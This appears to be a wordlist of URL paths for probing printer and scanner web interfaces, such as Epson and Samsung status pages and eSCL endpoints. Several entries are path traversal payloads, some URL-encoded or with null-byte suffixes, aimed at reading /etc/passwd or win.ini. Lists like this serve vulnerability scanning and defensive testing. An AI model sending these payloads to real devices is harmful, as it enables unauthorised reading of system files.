/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/installed_emanual_list.html

/cgi-bin/dynamic/config/secure/security.html
/./../../../../../../../../../../etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
/js/../../../../../../../../etc/passwd%00.jpg
/installed_emanual_down.html?path=/manual/../../../etc/passwd
/general/status.html
/PRESENTATION/EPSONCONNECT
/cgi-bin/home
/hdstat.htm
/sws/index.html
/sws/index.sws
/PRESENTATION/HTML/TOP/PRTINFO.HTML
/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm
/sessionlist.html
/etc/mnt_info.csv
/net/net/net.html
/amr
/eSCL/ScannerCapabilities
